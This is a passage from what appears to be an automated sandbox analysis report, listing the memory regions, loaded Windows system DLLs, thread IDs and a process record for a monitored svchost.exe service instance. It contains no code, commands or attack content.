monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4267 start_va = 0x37f0000 end_va = 0x38effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 4268 start_va = 0x38f0000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4269 start_va = 0x3900000 end_va = 0x390ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4270 start_va = 0x3910000 end_va = 0x391ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4271 start_va = 0x3920000 end_va = 0x392ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4272 start_va = 0x3930000 end_va = 0x393ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4273 start_va = 0x3940000 end_va = 0x394ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4274 start_va = 0x3950000 end_va = 0x395ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4275 start_va = 0x3960000 end_va = 0x396ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4276 start_va = 0x3970000 end_va = 0x397ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4277 start_va = 0x3980000 end_va = 0x3a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003980000" filename = "" Region: id = 4278 start_va = 0x3a80000 end_va = 0x3b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 4279 start_va = 0x3b90000 end_va = 0x3b9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4280 start_va = 0x3ba0000 end_va = 0x3baffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4281 start_va = 0x3bb0000 end_va = 0x3bbffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4282 start_va = 0x3bc0000 end_va = 0x3bcffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4283 start_va = 0x3bd0000 end_va = 0x3bdffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4284 start_va = 0x3be0000 end_va = 0x3beffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4285 start_va = 0x3bf0000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4286 start_va = 0x3c00000 end_va = 0x3c0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4287 start_va = 0x3c10000 end_va = 0x3c1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4288 start_va = 0x3c20000 end_va = 0x3c2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4289 start_va = 0x3c50000 end_va = 0x3c5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4290 start_va = 0x3c60000 end_va = 0x3c6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 4291 start_va = 0x3c70000 end_va = 0x3d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c70000" filename = "" Region: id = 4292 start_va = 0x3d70000 end_va = 0x3e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d70000" filename = "" Region: id = 4293 start_va = 0x3e90000 end_va = 0x3f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 4294 start_va = 0x3fa0000 end_va = 0x409ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fa0000" filename = "" Region: id = 4295 start_va = 0x40a0000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040a0000" filename = "" Region: id = 4296 start_va = 0x41e0000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 4297 start_va = 0x42e0000 end_va = 0x43dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 4298 start_va = 0x43e0000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043e0000" filename = "" Region: id = 4299 start_va = 0x44e0000 end_va = 0x45dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 4300 start_va = 0x45e0000 end_va = 0x46dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 4301 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 4302 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4303 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 4304 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 4305 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 4306 start_va = 0x7ff6c7f10000 end_va = 0x7ff6c7f1cfff monitored = 0 entry_point = 0x7ff6c7f13980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4307 start_va = 0x7ff84d450000 end_va = 0x7ff84d607fff monitored = 0 entry_point = 0x7ff84d4be630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 4308 start_va = 0x7ff84d610000 end_va = 0x7ff84d68bfff monitored = 0 entry_point = 0x7ff84d63a970 region_type = mapped_file name = "tileobjserver.dll" filename = "\\Windows\\System32\\tileobjserver.dll" (normalized: "c:\\windows\\system32\\tileobjserver.dll") Region: id = 4309 start_va = 0x7ff84dbf0000 end_va = 0x7ff84dee8fff monitored = 0 entry_point = 0x7ff84dcb7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 4310 start_va = 0x7ff84ee50000 end_va = 0x7ff84eee3fff monitored = 0 entry_point = 0x7ff84ee89210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 4311 start_va = 0x7ff84eef0000 end_va = 0x7ff84f192fff monitored = 0 entry_point = 0x7ff84ef16190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 4312 start_va = 0x7ff8539c0000 end_va = 0x7ff853d41fff monitored = 0 entry_point = 0x7ff853a11220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4313 start_va = 0x7ff855250000 end_va = 0x7ff855385fff monitored = 0 entry_point = 0x7ff85527f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 4314 start_va = 0x7ff855b80000 end_va = 0x7ff855c11fff monitored = 0 entry_point = 0x7ff855bca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 4315 start_va = 0x7ff856dc0000 end_va = 0x7ff857252fff monitored = 0 entry_point = 0x7ff856dcf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 4316 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4317 start_va = 0x7ff858890000 end_va = 0x7ff858983fff monitored = 0 entry_point = 0x7ff85889a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4318 start_va = 0x7ff858d00000 end_va = 0x7ff858d33fff monitored = 0 entry_point = 0x7ff858d1ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4319 start_va = 0x7ff858e50000 end_va = 0x7ff858e6efff monitored = 0 entry_point = 0x7ff858e55d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4320 start_va = 0x7ff859020000 end_va = 0x7ff859075fff monitored = 0 entry_point = 0x7ff859030bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4321 start_va = 0x7ff8590d0000 end_va = 0x7ff8590e6fff monitored = 0 entry_point = 0x7ff8590d79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4322 start_va = 0x7ff8591f0000 end_va = 0x7ff8591fafff monitored = 0 entry_point = 0x7ff8591f19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4323 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4324 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4325 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4326 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4327 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4328 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4329 start_va = 0x7ff859c70000 end_va = 0x7ff85a2b3fff monitored = 0 entry_point = 0x7ff859e364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4330 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4331 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4332 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4333 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4334 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4335 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4336 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4337 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4338 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4339 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4340 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4341 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4342 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4343 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 493 os_tid = 0x958 Thread: id = 494 os_tid = 0x9ac Thread: id = 495 os_tid = 0x9b0 Thread: id = 496 os_tid = 0x804 Thread: id = 497 os_tid = 0x760 Thread: id = 498 os_tid = 0x558 Thread: id = 499 os_tid = 0x8e4 Thread: id = 500 os_tid = 0x60c Thread: id = 501 os_tid = 0x5f0 Thread: id = 502 os_tid = 0xbbc Thread: id = 503 os_tid = 0x9b4 Thread: id = 504 os_tid = 0x938 Thread: id = 505 os_tid = 0x89c Thread: id = 506 os_tid = 0xbe0 Thread: id = 507 os_tid = 0xa50 Thread: id = 508 os_tid = 0x810 Thread: id = 509 os_tid = 0x7b8 Thread: id = 510 os_tid = 0x7c0 Thread: id = 511 os_tid = 0x7dc Thread: id = 512 os_tid = 0x750 Thread: id = 513 os_tid = 0x74c Thread: id = 514 os_tid = 0x748 Thread: id = 515 os_tid = 0x628 Process: id = "38" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x32435000" os_pid = "0x83c" os_integrity_level = "0x4000" os_privileges = "0x860814080" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\System32\\svchost.exe -k wsappx" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppXSvc" [0xa], "NT SERVICE\\ClipSVC" [0xe], "NT SERVICE\\WSService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0001de06" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 516 os_tid = 0x980 Thread: id = 517 os_tid = 0x8a0 Thread: id = 518 os_tid = 0x898 Thread: id = 519 os_tid = 0x880 Thread: id = 520 os_tid = 0x840